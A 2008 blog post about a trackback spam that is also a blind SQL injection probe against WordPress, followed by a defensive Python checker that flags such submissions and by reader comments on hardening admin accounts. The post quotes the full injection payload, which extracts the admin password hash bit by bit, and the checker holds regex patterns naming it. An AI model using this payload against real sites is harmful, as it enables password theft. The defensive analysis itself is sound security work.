Attack of the Wordpress-Hacking Spam Trackbacks
June 7th, 2008 by Elliott Back
So this is a cute comment I got, a trackback spam that’s also a SQL injection exploit for Wordpress. Check it out:
Website: ' AND 1=0) UNION SELECT 1 FROM wp_users WHERE user_login='admin' and substring(reverse(lpad(conv(substring(user_pass,8,1), 16, 2),4,'0')),4,1)='1' /* (IP: 124.217.250.190 , svservers.com)
URI: http://None
Excerpt: None…
It appears to be a known-ciphertext or weak-hash exploit against WordPress, a blind SQL injection fishing for the admin password hash one bit at a time, and it has an obvious signature. Cute.
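As an added defender-side example (my code, not part of the original post), here is a small Python checker that flags trackback submissions shaped like the probe above: a quote break-out, a UNION SELECT against wp_users, string/bit-extraction functions, a trailing comment, and the give-away placeholder URL. The sample records are constructed; the first mirrors the quoted payload.

```python
import re
from urllib.parse import urlparse

# Constructed trackback submissions (not taken from a live site). The first
# reproduces the shape of the probe quoted in the post; the second is benign
# and contains an apostrophe on purpose, to show that alone is not a hit.
SAMPLE_TRACKBACKS = [
    {"title": "hot gadgets",
     "url": "http://None",
     "blog_name": "' AND 1=0) UNION SELECT 1 FROM wp_users WHERE user_login='admin' "
                  "and substring(reverse(lpad(conv(substring(user_pass,8,1),16,2),4,'0')),4,1)='1' /*",
     "excerpt": "None..."},
    {"title": "O'Brien's WordPress tips",
     "url": "http://example.com/2008/06/wp-tips/",
     "blog_name": "O'Brien's blog",
     "excerpt": "A round-up of plugins I actually use."},
]

# Each rule matches one structural feature of the probe rather than the
# literal string, so re-spacing or a different column index is still caught.
RULES = [
    ("quote_breakout", re.compile(r"^\s*['\"]\s*(and|or)\b", re.I)),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("wp_users_ref", re.compile(r"\b(wp_users|user_pass|user_login)\b", re.I)),
    ("bit_extract", re.compile(r"\b(conv|lpad|reverse|substring|substr|ascii)\s*\(", re.I)),
    ("comment_tail", re.compile(r"/\*|--\s|#\s*$")),
]

def check_field(value):
    """Names of the rules that fire on one trackback field."""
    return [name for name, rx in RULES if rx.search(value)]

def url_is_plausible(url):
    """The probe sends 'http://None'; a real trackback URL has a dotted host."""
    p = urlparse(url)
    return p.scheme in ("http", "https") and "." in p.netloc

def score_trackback(tb):
    """Flag a submission when its URL is bogus or two or more rules fire.
    A single hit (say, 'substring(' in a developer blog's excerpt) is not
    enough on its own, which keeps false positives down."""
    hits = {}
    for field in ("title", "url", "blog_name", "excerpt"):
        fired = check_field(tb.get(field, ""))
        if fired:
            hits[field] = fired
    bad_url = not url_is_plausible(tb.get("url", ""))
    suspicious = bad_url or sum(len(v) for v in hits.values()) >= 2
    return {"suspicious": suspicious, "bad_url": bad_url, "hits": hits}
```

Hooking this into the trackback handler and dropping (or holding for moderation) anything it flags stops the probe from ever reaching the database query.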
Thanks Sebastian. http://codex.wordpress.org/Users_Authors_and_Users_SubPanel is the official writeup of what you suggest.
@Cody – probably a separate username / password setup in the control panel. Look under protected directories, depending on what CP you use.
@hot gadgets: changing the default user name from admin to something else means that the attackers have to look for both a user name and a password, which increases the complexity.
If they already know there is a user called admin, then part of their problem is solved.
Actually, someone found a fraud backlink code which disables comments from any IP in the list of hosting providers’ ranges.
Meaning… if IP=(LIST)&REQUEST_URI=WP-COMMENT.PHP then it is redirected to another page automatically. Mainly, renaming your wp-comment.php normally solves this issue (except for multi-blogs).
azrin @ http://www.chat.nu
How does changing the admin account solve the problem?
All of a sudden my WordPress blog is showing a “Restricted Access” popup window asking all visitors to my site to provide a username and password.
Does anyone know if this is some sort of spam attack?
If so, can anyone tell me where to look in my admin panel to fix this?
I posted this question over at the WordPress forum but got no responses and the info I’ve seen in the WordPress troubleshooting forum didn’t clear up my question.
Thanks in advance!
People should be sharing more free things like this. It’s what keeps the Internet buzzin’.
Spammers are so frustrating. Isn’t there some way to get rid of them?
You must change your admin’s username to secure your blog.
1. Create a new user and give him admin rights.
2. Log out, log in with the new user account, and delete the old admin account. But attention: when deleting the old account it asks you whether to move your posts to the new account. Check yes!
Sebastian
Knowtebook
So is this a WP security hole in WordPress 2.5.1? Or has the hole been plugged by now?
Can I prevent that SQL injection by disabling trackbacks?
I’m managing my friend’s blog, and I found this just a few moments ago. I’m currently logged in as admin. Is there anything to worry about, or is this just another failed SQL injection?
This is what I got:
Thanks!